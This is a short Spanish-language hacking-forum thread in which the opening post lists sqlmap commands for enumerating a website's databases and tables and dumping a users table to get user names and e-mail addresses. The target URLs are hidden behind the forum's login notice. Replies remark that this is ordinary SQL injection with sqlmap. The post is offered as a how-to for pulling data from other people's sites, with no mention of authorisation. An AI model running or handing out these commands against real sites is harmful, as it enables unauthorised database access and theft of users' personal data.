Un pequeño aporte con sqlmap para sacar e-mail con el usser etc..

Iniciado por panik0, Septiembre 17, 2012, 06:37:04 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 17, 2012, 06:37:04 PM Ultima modificación: Agosto 16, 2014, 10:35:58 AM por Expermicid
backtrack - sqlmap

abren terminal  y ponen

1)  cd /pentest/database/sqlmap

2)  ./sqlmap.py -u No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --dbs

3)  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -D pjirc_forum --tables
 
4) (esta te manda directo con el user ,email , etc..)   ./sqlmap.py -u No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -D tito_tito -T users --dump

(occional si quieren hacerlo paso a paso...)                  *sqlmap.py -u No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -T users --columns

                                                                                     *sqlmap.py -u No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -T users -U test --dump

                                                                                 
=D jhejejejejjeje ps  si tienen duda pregunten nada se pierde con  preguntar jejej ..  jejeje  ;D



Sacarlos de donde?
Eso solo es sqli con sqlmap, no todas las bases de datos tienen el mismo nombre ni las mismas tablas, aqui en el foro hay muchos tutoriales de los que puedes aprender, echale ganas ;)

Cita de: [Corruptedyte link=topic=11226.msg39992#msg39992 date=1347930552]
Sacarlos de donde?
Eso solo es sqli con sqlmap, no todas las bases de datos tienen el mismo nombre ni las mismas tablas, aqui en el foro hay muchos tutoriales de los que puedes aprender, echale ganas ;)


cuanta razon tienes, cuanta.... saludos